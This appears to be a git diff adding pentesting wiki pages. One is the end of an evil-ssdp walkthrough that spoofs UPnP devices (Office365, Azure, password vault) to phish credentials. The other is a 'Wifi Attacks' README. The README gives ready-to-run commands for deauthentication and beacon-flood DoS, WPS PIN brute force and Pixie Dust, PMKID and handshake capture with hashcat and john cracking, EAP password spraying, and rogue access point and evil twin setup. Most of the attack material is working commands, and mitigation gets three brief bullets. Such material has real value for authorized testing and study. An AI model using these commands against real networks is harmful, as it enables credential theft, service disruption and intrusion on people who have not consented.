+Upon clicking the icon inside the Explorer, we will be redirected to the default Web Browser, opening our hosted link. The templates that we used are in play here. The user is now aware he/she is indeed connected to a genuine scanner or a fake UPnP device that we generated. Unaware target having no clue enters the valid credentials on this template as shown in the image given below.
+
+![](https://i2.wp.com/1.bp.blogspot.com/-lp2DBNRl12A/Xkq5RBtGvgI/AAAAAAAAiss/G9jSOVdBO4wnRKixpXlbj6BJeCTBWz7cACLcBGAsYHQ/s1600/4.png?w=687&ssl=1)
+
+### **Grabbing the Credentials**
+
+As soon as the target user enters the credentials, we check our terminal on the attacker machine to find that we have the credentials entered by the user. As there is no conversation required for each target device, our fake scanner is visible to each and every user in the network. This means the scope of this kind of attack is limitless.
+
+![](https://i1.wp.com/1.bp.blogspot.com/-RAI02igc4F4/Xkq5RSJ3j2I/AAAAAAAAisw/p47jd_jyyAE3RQIpms6nd-TzsPygD4CXQCLcBGAsYHQ/s1600/5.png?w=687&ssl=1)
+
+## **Spoofing Office365 SSDP**
+
+In the previous practical, we spoofed the scanner to the target user. Now, ongoing through the template directory, we found the Office365 template. Let’s use it.
+
+### **Template Configuration**
+
+As we did previously, let’s begin with the configuration of the template as well as the tool. We are going to use the python3 to run the tool followed by the name of the python file. Then providing the network interface which indeed will be followed by the template parameter with the office365.
+
+```bash
+python3 evil-ssdp.py eth0 --template office365
+```
+
+![](https://i1.wp.com/1.bp.blogspot.com/-8GWxmKPDkIo/Xkq5RmgF8_I/AAAAAAAAis0/bxVTcd4aBCUZBEDuUIg3-G39aMu7l5YCgCLcBGAsYHQ/s1600/6.png?w=687&ssl=1)
+
+As we can see that the tool has done its job and hosted multiple template files on our attacker machine at port 8888.
+
+### **Manipulating User**
+
+As soon as we run the tool, we have a UPnP device named Office365 Backups. This was done by the tool without having to send any file, payload or any other type of interaction to the target user. All that’s left is the user to click on the icon.
+
+![](https://i0.wp.com/1.bp.blogspot.com/-txqBOw02D6w/Xkq5RgolUcI/AAAAAAAAis4/wkQTzYBmtdU_Nbq9X1qI47FlJtdqHvIjQCLcBGAsYHQ/s1600/7.png?w=687&ssl=1)
+
+Upon being clicked by the user, the target user is redirected to our fake template page through their default browser. This is a very genuine looking Microsoft webpage. The clueless user enters their valid credentials onto this page.
+
+![](https://i1.wp.com/1.bp.blogspot.com/-69Tf3PRpvhM/Xkq5RziDXzI/AAAAAAAAis8/vjejKgh0XigRHFC2Ib8QCpPlzx_RAu4eACLcBGAsYHQ/s1600/8.png?w=687&ssl=1)
+
+### **Grabbing the Credentials**
+
+As soon as the user enters the credentials and they get passed as the post request to the server, which is our target machine, we see that on our terminal, we have the credentials.
+
+![](https://i0.wp.com/1.bp.blogspot.com/-3KXN6DKT_E0/Xkq5SEwhKHI/AAAAAAAAitA/a2gTi5UwNE0JsMH-XQEW33MchkxgjPGSwCLcBGAsYHQ/s1600/9.png?w=687&ssl=1)
+
+## **Diverting User to a Password Vault SSDP**
+
+Until now, we successfully spoofed the target user to gain some scanner credentials and some Office365 backup credentials. But now we go for the most important thing that is used as a UPnP, The Password Vault.
+
+### **Template Configuration**
+
+As we did in our previous practices, we will have to set up the template for the password-vault. In no time, the tool hosts the password-vault template onto the port 8888.
+
+```bash
+python3 evil-ssdp.py eth0 --template password-vault
+```
+
+![](https://i2.wp.com/1.bp.blogspot.com/-YPQirClmWN4/Xkq5O5WFgoI/AAAAAAAAisI/4_i4ogVRWE0C_ez3p6EkL8YdJ0ot48DmwCLcBGAsYHQ/s1600/10.png?w=687&ssl=1)
+
+### **Manipulating User**
+
+Moving onto the target machine, we see that the Password Vault UPnP is visible in the Explorer. Now lies that the user clicks on the device and gets trapped into our attack. Seeing something like Password Vault, the user will be tempted to click on the icon.
+
+![](https://i2.wp.com/1.bp.blogspot.com/-3oMPYaCZ46k/Xkq5PB4zQ_I/AAAAAAAAisM/i5C8qZVB8RYWBwAkiKCZbdptIbsnk4CUwCLcBGAsYHQ/s1600/11.png?w=687&ssl=1)
+
+As the clueless user thinks that he/she has achieved far most important stuff with the fake keys and passwords. This works as a distraction for the user, as this will lead the user to try this exhaustive list of credentials with no success.
+
+![](https://i0.wp.com/1.bp.blogspot.com/-SrCMlWIUxCM/Xkq5Pg_IznI/AAAAAAAAisU/L_ZIvQKfltkyk9iUCrEGyXCojx5b86uFgCLcBGAsYHQ/s1600/12.png?w=687&ssl=1)
+
+## **Spoofing Microsoft Azure SSDP**
+
+While working with Spoofing, one of the most important tasks is to not let the target user know that he/she has been a victim of Spoofing.  This can be achieved by redirecting the user after we grab the credentials or cookies or anything that the attacker wanted to acquire. The evil\_ssdp tool has a parameter \(-u\) which redirects the targeted user to any URL of the attacker’s choice. Let’s take a look at the working of this parameter in action.
+
+To start, we will use the python3 for loading the tool. Followed by we mention the Network Interface that should be used. Now for this practical, we will be using the Microsoft Azure Storage Template. After selecting the template, we put the \(-u\) parameter and then mention any URL where we want to redirect the user. Here we are using the Microsoft official Link. But this can be any malicious site.
+
+```bash
+python3 evil-ssdp.py eth0 --template microsoft-azure -u https://malicous-site.com
+```
+
+![](https://i2.wp.com/1.bp.blogspot.com/-ReHCqgFazX0/Xkq5QBiQ7jI/AAAAAAAAisY/_DFdnzBpSGY1iDP1YJxeVTHF3iS5PZnqwCLcBGAsYHQ/s1600/13.png?w=687&ssl=1)
+
+### **Manipulating User**
+
+Now that we have started the tool, it will create a UPnP device on the Target Machine as shown in the image given below. For the attack to be successful, the target needs to click on the device.
+
+![](https://i1.wp.com/1.bp.blogspot.com/-rROTfEGP3z8/Xkq5QBn46dI/AAAAAAAAisc/7RDv7fI3BPYt1XmrKVRKOEHurkGY1xeogCLcBGAsYHQ/s1600/14.png?w=687&ssl=1)
+
+After clicking the icon, we see that the user is redirected to the Microsoft Official Page. This can be whatever the attacker wants it to be.
+
+![](https://i2.wp.com/1.bp.blogspot.com/-gU36s2kyIbg/Xkq5QVRh61I/AAAAAAAAisg/hN3uVMTPh-suDiH5ID3-mWcQiNvDVYeJACLcBGAsYHQ/s1600/15.png?w=687&ssl=1)
+
+This concludes our practical of this awesome spoofing tool.
+
+## **Mitigation**
+
+* Disable UPnP devices.
+* Educate Users to prevent phishing attacks
+* Monitor the network for the password travel in cleartext.
+
diff --git a/pentesting/pentesting-network/wifi-attacks/README.md b/pentesting/pentesting-network/wifi-attacks/README.md
new file mode 100644
index 00000000..1aa14d84
--- /dev/null
+++ b/pentesting/pentesting-network/wifi-attacks/README.md
@@ -0,0 +1,737 @@
+# Wifi Attacks
+
+## Wifi basic commands
+
+```bash
+ip link show #List available interfaces
+iwconfig #List available interfaces
+airmon-ng check kill #Kill annoying processes
+airmon-ng start wlan0 #Monitor mode
+airmon-ng stop wlan0mon #Managed mode
+airodump-ng wlan0mon #Scan (default 2.4Ghz)
+airodump-ng wlan0mon --band a #Scan 5Ghz
+iwconfig wlan0 mode monitor #Put in mode monitor
+iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
+iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
+```
+
+## Tools
+
+### EAPHammer
+
+```text
+git clone https://github.com/s0lst1c3/eaphammer.git
+./kali-setup
+```
+
+### Airgeddon
+
+```bash
+mv `which dhcpd` `which dhcpd`.old
+apt install isc-dhcp-server
+apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe
+```
+
+#### Run airgeddon with docker
+
+```bash
+docker run \
+          --rm \
+          -ti \
+          --name airgeddon \
+          --net=host \
+          --privileged \
+          -p 3000:3000 \
+          -v /tmp:/io \
+          -e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
+          v1s1t0r1sh3r3/airgeddon
+```
+
+From: [https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux](https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux)
+
+## Resume attacks
+
+* **DoS** 
+  * Deauthentication/disassociation -- Disconnect everyone \(or a specific ESSID/Client\)
+  * Random fake APs -- Hide nets, possible crash scanners\)
+  * Overload AP -- Try to kill the AP \(usually not very useful\)
+  * WIDS -- Play with the IDS
+  * TKIP, EAPOL -- Some specific attacks to DoS some APs
+* **Cracking**
+  * Crack **WEP** \(several tools and methods\)
+  * **WPA-PSK**
+    * **WPS** pin "Brute-Force"
+    * **WPA PMKID** bruteforce
+    * \[DoS +\] **WPA handshake** capture + Cracking
+  * **WPA-MGT**
+    * **Username capture**
+    * **Bruteforce** Credentials
+* **Evil Twin** \(with or without DoS\)
+  * **Open** Evil Twin \[+ DoS\] -- Useful to capture captive portal creds and/or perform LAN attacks
+  * **WPA-PSK** Evil Twin -- Useful to network attacks if you know the password
+  * **WPA-MGT** -- Useful to capture company credentials
+* **MANA**, **Loud MANA**, **Known beacon**
+  * **+ Open** -- Useful to capture captive portal creds and/or perform LAN attacks
+  * **+ WPA** -- Useful to capture WPA handshakes
+
+## DOS
+
+### Deauthentication Packets
+
+The most common way this sort of attack is done is with **deauthentication** packets. These are a type of "management" frame responsible for disconnecting a device from an access point. Forging these packets is the key to [hacking many Wi-Fi networks](https://null-byte.wonderhowto.com/how-to/wi-fi-hacking/), as you can forcibly disconnect any client from the network at any time. The ease of which this can be done is somewhat frightening and is often done as part of gathering a WPA handshake for cracking.
+
+Aside from momentarily using this disconnection to harvest a handshake to crack, you can also just let those deauths keep coming, which has the effect of peppering the client with deauth packets seemingly from the network they are connected to. Because these frames aren't encrypted, many programs take advantage of management frames by forging them and sending them to either one or all devices on a network.  
+**Description from** [**here**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
+
+#### **Deauthentication using Aireplay-ng**
+
+```text
+aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
+```
+
+* -0 means deauthentication
+* 1 is the number of deauths to send \(you can send multiple if you wish\); 0 means send them continuously
+* -a 00:14:6C:7E:40:80 is the MAC address of the access point
+* -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then broadcast deauthentication is sent \(not always work\)
+* ath0 is the interface name
+
+### Disassociation Packets
+
+Disassociation packets are another type of management frame that is used to disconnect a node \(meaning any device like a laptop or cell phone\) from a nearby access point. The difference between deauthentication and disassociation frames is primarily the way they are used.
+
+An AP looking to disconnect a rogue device would send a deauthentication packet to inform the device it has been disconnected from the network, whereas a disassociation packet is used to disconnect any nodes when the AP is powering down, rebooting, or leaving the area.
+
+**Description from** [**here**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
+
+**This attack can be performed by mdk4\(mode "d"\):**
+
+```bash
+# -c <channel>
+# -b victim_client_mac.txt contains the MAC address of the device to eliminate
+# -e WifiName is the name of the wifi
+# -B BSSID is the BSSID of the AP
+# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them 
+mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
+```
+
+### **More DOS attacks by mdk4**
+
+**From** [**here**](https://en.kali.tools/?p=864)**.**
+
+**ATTACK MODE b: Beacon Flooding**
+
+Sends beacon frames to show fake APs at clients. This can sometimes crash network scanners and even drivers!
+
+```bash
+# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
+# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
+# -m use real BSSIDS
+# All the parameters are optional and you could load ESSIDs from a file
+mdk4 wlan0mon b -a -w nta -m
+```
+
+**ATTACK MODE a: Authentication Denial-Of-Service**
+
+Sends authentication frames to all APs found in range. Too many clients can freeze or reset several APs.
+
+```bash
+# -a BSSID send random data from random clients to try the DoS
+# -i BSSID capture and repeat pakets from authenticated clients
+# -m use real MACs
+# only -a or -i can be used
+mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m
+```
+
+**ATTACK MODE p: SSID Probing and Bruteforcing**
+
+Probes APs and checks for answer, useful for checking if SSID has been correctly decloaked and if AP is in your sending range. **Bruteforcing of hidden SSIDs** with or without a wordlist is also available.
+
+**ATTACK MODE m: Michael Countermeasures Exploitation**
+
+Sends random packets or re-injects duplicates on another QoS queue to provoke Michael Countermeasures on **TKIP APs**. AP will then shutdown for a whole minute, making this an effective **DoS**.
+
+```bash
+# -t <BSSID> of a TKIP AP
+# -j use inteligent replay to create the DoS
+mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]
+```
+
+**ATTACK MODE e: EAPOL Start and Logoff Packet Injection**
+
+Floods an AP with **EAPOL** Start frames to keep it busy with **fake sessions** and thus disables it to handle any legitimate clients. Or logs off clients by **injecting fake** EAPOL **Logoff messages**.
+
+```bash
+# Use Logoff messages to kick clients
+mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]
+```
+
+**ATTACK MODE s: Attacks for IEEE 802.11s mesh networks**
+
+Various attacks on link management and routing in mesh networks. Flood neighbors and routes, create black holes and divert traffic! 
+
+**ATTACK MODE w: WIDS Confusion**
+
+Confuse/Abuse Intrusion Detection and Prevention Systems by cross-connecting clients to multiple WDS nodes or fake rogue APs.
+
+```bash
+# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
+mkd4 -e <SSID> -c <channel> [-z]
+```
+
+**ATTACK MODE f: Packet Fuzzer**
+
+A simple packet fuzzer with multiple packet sources and a nice set of modifiers. Be careful!
+
+### **Airggedon**
+
+_**Airgeddon**_ offers most of the attacks proposed in the previous comments:
+
+![](../../../.gitbook/assets/image%20%28133%29.png)
+
+## WPS
+
+WPS stands for Wi-Fi Protected Setup. It is a wireless network security standard that tries to make connections between a router and wireless devices faster and easier. **WPS works only for wireless networks that use a password** that is encrypted with the **WPA** Personal or **WPA2** Personal security protocols. WPS doesn't work on wireless networks that are using the deprecated WEP security, which can be cracked easily by any hacker with a basic set of tools and skills. \(From [here](https://www.digitalcitizen.life/simple-questions-what-wps-wi-fi-protected-setup)\)
+
+WPS uses a 8 length PIN to allow a user to connect to the network, but it's first checked the first 4 numbers and, if correct, then is checked the second 4 numbers. Then, it is possible to Brute-Force the first half and then the second half \(only 11000 possibilities\).
+
+### WPS Bruteforce
+
+There are 2 main tools to perform this action: Reaver and Bully.
+
+* Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
+* Bully is a new implementation of the WPS brute force attack, written in C. It has several advantages over the original reaver code: fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems \(OpenWrt, etc\) regardless of architecture.
+
+  Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success.
+
+If the WPS valid code is found, both Bully and Reaver will use it to discover the WPA/WPA2 PSK used to protect the network, so you will be able to connect anytime you need it.
+
+```text
+reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot    
+bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
+```
+
+#### Smart Brute force
+
+Instead of starting trying every possible PIN, you should check if there are available **PINs discoveredfor the AP you are attacking** \(depending of the manufacturer MAC\) and the **PIN software generated PINs**.
+
+* The database of known PINs is made for Access Points of certain manufacturers for which it is known that they use the same WPS PINs. This database contains the first three octets of MAC-addresses and a list of corresponding PINs that are very likely for this manufacturer.
+
+* There are several algorithms for generating WPS PINs. For example, ComputePIN and EasyBox use the MAC-address of the Access Point in their calculations. But the Arcadyan algorithm also requires a device ID.
+
+### WPS Pixie Dust attack
+
+Dominique Bongard discovered that some APs have weak ways of generating **nonces** \(known as **E-S1** and **E-S2**\) that are supposed to be secret. If we are able to figure out what these nonces are, we can easily find the WPS PIN of an AP since the AP must give it to us in a hash in order to prove that it also knowns the PIN, and the client is not connecting to a rouge AP. These E-S1 and E-S2 are essentially the "keys to unlock the lock box" containing the WPS pin. More info here: [https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-%28Offline-WPS-Attack%29)
+
+Basically, some implementations failed in the use of random keys to encrypt the 2 parts of the the PIN\(as it is discomposed in 2 parts during the authentication communication and sent to the client\), so an offline attack could be used to brute force the valid PIN.
+
+```text
+reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
+bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3
+```
+
+### Null Pin attack
+
+Some really bad implementations allowed the Null PIN to connect \(very weird also\). Reaver can test this \(Bully cannot\).
+
+```text
+ reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
+```
+
+### Airgeddon
+
+All the proposed WPS attacks can be easily performed using _**airgeddon.**_
+
+![](../../../.gitbook/assets/image%20%28260%29.png)
+
+* 5 and 6 lets you try **your custom PIN** \(if you have any\)
+* 7 and 8 perform the **Pixie Dust attack**
+* 13 allows you to test the **NULL PIN**
+* 11 and 12 will **recollect the PINs related to the selected AP from available databases** and **generate** possible **PINs** using: ComputePIN, EasyBox and optionally Arcadyan \(recommended, why not?\)
+* 9 and 10 will test **every possible PIN**
+
+## **WEP**
+
+So broken and disappeared that I am not going to talk about it. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options.
+
+![](../../../.gitbook/assets/image%20%28277%29.png)
+
+## WPA/WPA2 PSK
+
+### PMKID
+
+In 2018 hashcat authors [disclosed](https://hashcat.net/forum/thread-7717.html) a new type of attack which not only relies **on one single packet**, but it doesn’t require any clients to be connected to our target AP or, if clients are connected, it doesn’t require us to send deauth frames to them, there’s no interaction between the attacker and client stations, but just between the attacker and the AP, interaction which, if the router is vulnerable, is almost immediate!
+
+It turns out that **a lot** of modern routers append an **optional field** at the end of the **first EAPOL** frame sent by the AP itself when someone is associating, the so called `Robust Security Network`, which includes something called `PMKID`
+
+As explained in the original post, the **PMKID** is derived by using data which is known to us:
+
+```text
+PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
+```
+
+**Since the “PMK Name” string is constant, we know both the BSSID of the AP and the station and the `PMK` is the same one obtained from a full 4-way handshake**, this is all hashcat needs in order to crack the PSK and recover the passphrase!  
+Description obtained from [here](https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/).
+
+To **gather** this information and **bruteforce** locally the password you can do:
+
+```text
+airmon-ng check kill
+airmon-ng start wlan0
+git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
+hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
+```
+
+```bash
+#You can also obtains PMKIDs using eaphammer
+./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1
+```
+
+The **PMKIDs captured** will be shown in the **console** and also **saved** inside _**/tmp/attack.pcap**_  
+Now, convert the capture to **hashcat/john** format and crack it:
+
+```text
+hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
+hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
+john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
+```
+
+Please note the the format of a correct hash contains **4 parts**, like: _4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7\*566f6461666f6e65436f6e6e6563743034383131343838_  
+If yours **only** contains **3 parts**, then, it is **invalid** \(the PMKID capture wasn't valid\).
+
+Note that `hcxdumptool` **also capture handshakes** \(something like this will appear: **`MP:M1M2 RC:63258 EAPOLTIME:17091`**\). You could **transform** the **handshakes** to **hashcat**/**john** format using `cap2hccapx`
+
+```text
+tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
+cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
+hccap2john pmkid.hccapx > handshake.john
+john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
+aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes
+```
+
+_I have noticed that some handshakes captured with this tool couldn't be cracked even knowing the correct password. I would recommend to capture handshakes also via traditional way if possible, or capture several of them using this tool._
+
+### Handshake capture
+
+One way to attack **WPA/WPA2** networks is to capture a **handshake** and try to **crack** the used password **offline**. To do so you need to find the **BSSID** and **channel** of the **victim** network, and a **client** that is connected to the network.  
+Once you have that information you have to start **listening** to all the commutation of that **BSSID** in that **channel**, because hopefully the handshake will be send there:
+
+```bash
+airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
+```
+
+Now you need to **deauthenticate** the **client** for a few seconds so it will automatically authenticate again to the AP \(please read the part of DoS to find several ways to deauthenticate a client\):
+
+```bash
+aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, not always work
+```
+
+_Note that as the client was deauthenticated it could try to connect to a different AP or, in other cases, to a different network._
+
+Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening:
+
+![](../../../.gitbook/assets/image%20%28172%29.png)
+
+Once the handshake is captured you can **crack** it with `aircrack-ng`:
+
+```text
+aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
+```
+
+### Check if handshake in file
+
+#### aircrack
+
+```bash
+aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture
+```
+
+#### tshark
+
+```bash
+tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.
+```
+
+#### [cowpatty](https://github.com/roobixx/cowpatty)
+
+```text
+cowpatty -r psk-01.cap -s "ESSID" -f -
+```
+
+_If this tool finds an uncompleted handshake of an ESSID before the completed one, it won't detect the valid one._
+
+#### pyrit
+
+```bash
+apt-get install pyrit #Not working for newer versions of kali
+pyrit -r psk-01.cap analyze
+```
+
+## **WPA Enterprise \(MGT\)**
+
+**It** is important to talk about the **different authentication methods** that could be used by an enterprise Wifi. For this kind of Wifis you will probably find in `airodump-ng` something like this:
+
+```text
+6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi
+```
+
+**EAP** \(Extensible Authentication Protocol\) the **skull** of the **authentication communication**, on **top** of this, an **authentication algorithm** is used by the server to authenticate the **client** \(**supplicant**\) and in same cases by the client to authenticate the server.  
+Main authentication algorithms used in this case:
+
+* **EAP-GTC:** Is an EAP method to support the use of hardware tokens and one-time passwords with EAP-PEAP. Its implementation is similar to MSCHAPv2, but does not use a peer challenge. Instead, passwords are sent to the access point in **plaintext** \(very interesting for downgrade attacks\).
+* **EAP-MD-5 \(Message Digest\)**: The client send the MD5 hash of the password. **Not recommended**: Vulnrable to dictionary attacks, no server authentication and no way to generate per session wired equivalent privacy \(WEP\) keys.
+* **EAP-TLS \(Transport Layer Security\)**: It relies on **client-side and server-side certificates** to perform authentication and can be used to dynamically generate user-based and session-based WEP keys to secure subsequent communications.
+* **EAP-TTLS \(Tunneled Transport Layer Security\)**: **Mutual authentication** of the client and network through an encrypted channel \(or tunnel\), as well as a means to derive dynamic, per-user, per-session WEP keys. Unlike EAP-TLS, **EAP-TTLS requires only server-side certificates \(client will use credentials\)**.
+* **PEAP \(Protected Extensible Authentication Protocol\)**: PEAP is like the **EAP** protocol but creating a **TLS tunnel** to protect the communication. Then, weak authentication protocols can by used on top of EAP as they will be protected by the tunnel.
+  * **PEAP-MSCHAPv2**: This is also known as just **PEAP** because it is widely adopted. This is just the vulnerable challenge/response called MSCHAPv2 on to of PEAP \(it is protected by the TLS tunnel\).
+  * **PEAP-EAP-TLS or just PEAP-TLS**: Is very similar to **EAP-TLS** but a TLS tunnel is created before the certificates are exchanged.
+
+You can find more information about these authentication methods [here ](https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol)and [here](https://www.intel.com/content/www/us/en/support/articles/000006999/network-and-i-o/wireless-networking.html).
+
+### Username Capture
+
+Reading [https://tools.ietf.org/html/rfc3748\#page-27](https://tools.ietf.org/html/rfc3748#page-27) it looks like if you are using **EAP** the **"Identity"** **messages** must be **supported**, and the **username** is going to be sent in **clear** in the **"Response Identity"** messages.
+
+Even using one of the most secure of authentication methods: **PEAP-EAP-TLS**, it is possible to **capture the username sent in the EAP protocol**. To do so, **capture a authentication communication** \(start `airodump-ng` inside a channel and `wireshark` in the same interface\) and filter the packets by`eapol`.  
+Inside the "**Response, Identity**" packet, the **username** of the client will appear.
+
+![](../../../.gitbook/assets/image%20%28120%29.png)
+
+### EAP-Bruteforce \(password spray\)
+
+If the client is expected to use a **username and password** \(notice that **EAP-TLS won't be valid** in this case\), then you could try to get a **list** a **usernames** \(see next part\) and **passwords** and try to **bruteforce** the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
+
+```text
+./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
+```
+
+You could also do this attack using `eaphammer`:
+
+```text
+./eaphammer --eap-spray \
+	--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
+	--essid example-wifi \
+	--password bananas \
+	--user-list users.txt
+```
+
+## Client attacks Theory
+
+### Network Selection and Roaming
+
+Although the 802.11 protocol has very specific rules that dictate how a station can join an ESS, it does not specify how the station should select an ESS to connect to. Additionally, the protocol allows stations to roam freely between access points that share the same ESSID \(because you wouldn’t want to lose WiFi connectivity when walking from one end of a building to another, etc\). However, the 802.11 protocol does not specify how these access points should be selected. Furthermore, even though stations must be authenticated to the ESS in order to associate with an access point, the 802.11 protocol does not require the access point be authenticated to the station.
+
+### Preferred Network Lists \(PNLs\)
+
+Each time a station connects to a wireless network, the network’s ESSID is stored in the station’s Preferred Network List \(PNL\). The PNL is an ordered list of every network that the station has connected to in the past, and each entry in the PNL contains the network’s ESSID and any network-specific configuration information needed to establish a connection.
+
+### Passive Scanning
+
+In infrastructure networks, access points periodically transmit beacon frames to advertise their presence and capabilities to nearby stations. Beacons are broadcast frames, which means they are intended to be received by all nearby stations in range. Beacons include information about the AP’s supported rates, encryption capabilities, additional information, and most importantly, beacon frames contain the AP’s ESSID \(as long as ESSID broadcasting is not disabled\).
+
+During passive scanning, the client device listens for beacon frames from nearby access points. If the client device receives a beacon frame whose ESSID field matches an ESSID from the client’s PNL, the client will automatically connect to the access point that sent the beacon frame. Then, suppose we want to target a wireless device that is not currently connected to any wireless. If we know at least one entry in that client’s PNL, we can force the client to connect to us simply by creating our own access point with that entry’s ESSID.
+
+### Active Probing
+
+The second network selection algorithm used in 802.11 is known as Active Probing. Client devices that use active probing continuously transmit probe request frames to determine what APs are within range, as well as what their capabilities are. Probe requests come in two forms: directed and broadcast. Directed probe requests are addressed to a specific ESSID, and are the client’s way of checking if a specific network is nearby.
+
+Clients that use directed probing will send out probe requests for each network in its PNL. It should be noted that directed probing is the only way of identify the presence of nearby hidden networks. Broadcast probe requests work almost exactly the same way, but are sent with the SSID field set to NULL. This addresses the broadcast probe to all nearby access points, allowing the the station to check if any of its preferred networks are nearby without revealing the contents of its PNL
+
+## Simple AP with redirection to Internet
+
+Before explaining how to perform more complex attacks it's going to be explained **how** to just **create** an **AP** and **redirect** it's **traffic** to an interface connected **to** the **Internet**.
+
+Using `ifconfig -a` check that the wlan interface to create the AP and the interface connected to the Internet are present.
+
+### DHCP & DNS
+
+```bash
+apt-get install dnsmasq #Manages DHCP and DNS
+```
+
+create a config file _/etc/dnsmasq.conf_ as follows:
+
+```text
+interface=wlan0
+dhcp-authoritative
+dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
+dhcp-option=3,192.168.1.1
+dhcp-option=6,192.168.1.1
+server=8.8.8.8
+log-queries
+log-dhcp
+listen-address=127.0.0.1
+```
+
+Then **set IPs** and **routes**:
+
+```text
+ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
+route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
+```
+
+And then **start** dnsmasq:
+
+```text
+dnsmasq -C dnsmasq.conf -d
+```
+
+### hostapd
+
+```text
+apt-get install hostapd
+```
+
+Create a config file _hostapd.conf:_
+
+```text
+interface=wlan0
+driver=nl80211
+ssid=MITIWIFI
+hw_mode=g
+channel=11
+macaddr_acl=0
+ignore_broadcast_ssid=0
+auth_algs=1
+wpa=2
+wpa_passphrase=mitmwifi123
+wpa_key_mgmt=WPA-PSK
+wpa_pairwise=CCMP
+wpa_group_rekey=86400
+ieee80211n=1
+wme_enabled=1
+```
+
+**Stop annoying processes** , set **monitor mode**, and **start hostapd**:
+
+```text
+airmon-ng check kill
+ifconfig wlan0 down
+iwconfig wlan0 mode monitor
+ifconfig wlan0 up
+hostapd ./hostapd.conf
+```
+
+### Forwarding and Redirection
+
+```text
+iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
+iptables --append FORWARD --in-interface wlan0 -j ACCEPT
+echo 1 > /proc/sys/net/ipv4/ip_forward
+```
+
+## Evil Twin
+
+An evil twin attack is a type Wi-Fi attack that works by taking advantage of the fact that most computers and phones will only see the "name" or ESSID of a wireless network \(as the base station is not required to authenticate against the client\). This actually makes it very hard to distinguish between networks with the same name and same kind of encryption. In fact, many networks will have several network-extending access points all using the same name to expand access without confusing users.
+
+Due how the implementation of clients work \(remember that the 802.11 protocol allows stations to roam freely between access points within the same ESS\), it is possible to make a device to change the base station it is connected to. It is possible to do that offering a better signal \(which is not always possible\) or by blocking the access to the original base station \(deauthentication packets, jamming, or some other form of DoS attack\).
+
